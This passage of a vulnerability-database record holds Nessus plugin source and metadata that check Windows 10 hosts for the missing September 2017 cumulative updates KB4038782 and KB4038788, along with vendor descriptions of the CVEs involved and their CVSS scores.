script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. 
An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.(CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. 
An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system.\n input. (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. 
(CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711,\n CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. 
An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752,\n CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038782/windows-10-update-kb4038782\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62a3aab5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038782.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038782');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038782])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:35:46", "description": "The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. 
(CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when Microsoft Edge does not properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678, CVE-2017-8679)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8683)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. 
(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content. To exploit the bypass, an attacker must trick a user into either loading a page containing malicious content or visiting a malicious website. The attacker could also inject the malicious page into either a compromised website or an advertisement network. The update addresses the bypass by correcting how the Edge CSP validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740, CVE-2017-8752, CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. 
(CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11764", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8597", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8648", "CVE-2017-8649", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8712", "CVE-2017-8713", "CVE-2017-8716", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8724", "CVE-2017-8728", "CVE-2017-8729", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8739", "CVE-2017-8740", "CVE-2017-8741", "CVE-2017-8746", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8751", "CVE-2017-8752", "CVE-2017-8753", "CVE-2017-8754", 
"CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038788.NASL", "href": "https://www.tenable.com/plugins/nessus/103130", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103130);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8597\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8648\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8716\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8724\",\n \"CVE-2017-8728\",\n \"CVE-2017-8729\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8739\",\n \"CVE-2017-8740\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8751\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. 
